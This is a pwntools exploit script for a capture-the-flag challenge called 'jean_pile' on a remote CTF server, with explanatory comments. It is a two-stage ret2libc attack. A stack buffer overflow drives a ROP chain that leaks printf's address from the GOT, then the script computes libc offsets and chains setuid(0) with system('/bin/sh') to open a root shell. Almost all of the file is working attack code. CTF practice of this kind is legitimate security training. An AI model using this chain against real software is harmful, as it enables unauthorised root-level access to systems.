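from pwn import *

# Local debugging variant (kept for reproducing a run under gdb; the remote
# target is used below):
#
#   gdbscript = "b *service+340"
#   with gdb.debug("./jean_pile", setuid=False, aslr=False, gdbscript=gdbscript) as target:
#       ...


def get_plat(target):
    """Consume the menu up to the ``>>> `` prompt and choose option 1.

    Args:
        target: a pwntools tube (``process`` or ``remote``).
    """
    print(target.recvuntil(b">>> ").decode())
    target.sendline(b"1")


def choix_plat(target, payload):
    """Consume the sub-menu up to the ``>> `` prompt and send ``payload``.

    Args:
        target: a pwntools tube.
        payload: raw bytes written at the prompt; this is the input that
            overruns the stack buffer (see Stage 1 below).
    """
    print(target.recvuntil(b">> ").decode())
    target.sendline(payload)


# target = process("./jean_pile")
target = remote('challenges.404ctf.fr', 31957)

# ---------------------------------------------------------------------------
# Stage 1: leak the runtime address of printf through the GOT.
#
# The addresses below are fixed 0x4000xx values, i.e. the binary is evidently
# linked without PIE, and its GOT entry is readable by the chain; those two
# properties are what this stage relies on (PIE and full RELRO would remove
# the fixed addresses and make the leak target non-resolvable at this point).
# Recovered with:
#   objdump -d jean_pile | grep _start
#   ROPgadget --binary jean_pile | grep "pop rdi"
# ---------------------------------------------------------------------------
plt_main = p64(0x4006e0)    # main: re-entered after the leak for a second overflow
plt_put = p64(0x400660)     # puts@plt: prints the GOT entry as a C string
got_printf = p64(0x602020)  # printf@got: holds the resolved libc address
pop_rdi = p64(0x400b83)     # "pop rdi; ret": loads puts' single argument

# 56 bytes of filler reach the saved return address. The chain would never run
# past a stack canary, so the binary presumably has none.
junk = b"A" * 56

# Chain: puts(got_printf); main()  -> prints printf's address, then restarts.
payload = junk + pop_rdi + got_printf + plt_put + plt_main

get_plat(target)
choix_plat(target, payload)

# puts stops at the first NUL byte, so only the 6 significant bytes of the
# little-endian user-space address arrive; pad back to 8 before unpacking.
leaked_printf = target.recv()[:6].strip().ljust(8, b"\00")
leaked_printf = u64(leaked_printf)
log.success("Leaked printf@GLIBC: " + hex(leaked_printf))

# ---------------------------------------------------------------------------
# Stage 2: derive libc addresses from the leak and return into libc.
#
# Offsets are specific to the libc build shipped with the challenge; with a
# different build every value below changes. Recovered with:
#   readelf -s libc6-amd64_2.36-9+deb12u4_i386.so | grep print
#   strings -a -t x libc6-amd64_2.36-9+deb12u4_i386.so | grep /bin/sh
# ---------------------------------------------------------------------------
libc_printf = 0x525b0
libc_sys = 0x4c490
libc_setuid = 0xd54b0
libc_sh = 0x196031

# ASLR randomises only the mapping base; offsets inside libc are constant, so
# a single leaked symbol locates the whole library.
libc_base = leaked_printf - libc_printf
log.success("libc_main:" + hex(libc_base))

# Named `system_addr` rather than `sys`: `from pwn import *` re-exports the
# `sys` module, which the shorter name shadowed.
system_addr = p64(libc_base + libc_sys)
binsh_addr = p64(libc_base + libc_sh)
setuid_addr = p64(libc_base + libc_setuid)

# setuid(0) is called first. It only succeeds when the process still holds
# that privilege (e.g. a set-uid binary whose saved uid is 0), which is
# presumably the challenge's setup; otherwise it fails and changes nothing.
uid_root = p64(0)

# Chain: setuid(0); system("/bin/sh")
payload = junk + pop_rdi + uid_root + setuid_addr + pop_rdi + binsh_addr + system_addr

# get_plat(target)
# main has been re-entered, but only the option byte is sent here rather than
# get_plat(): the earlier recv() has presumably already consumed the first
# prompt.
target.sendline(b"1")
choix_plat(target, payload)
target.interactive()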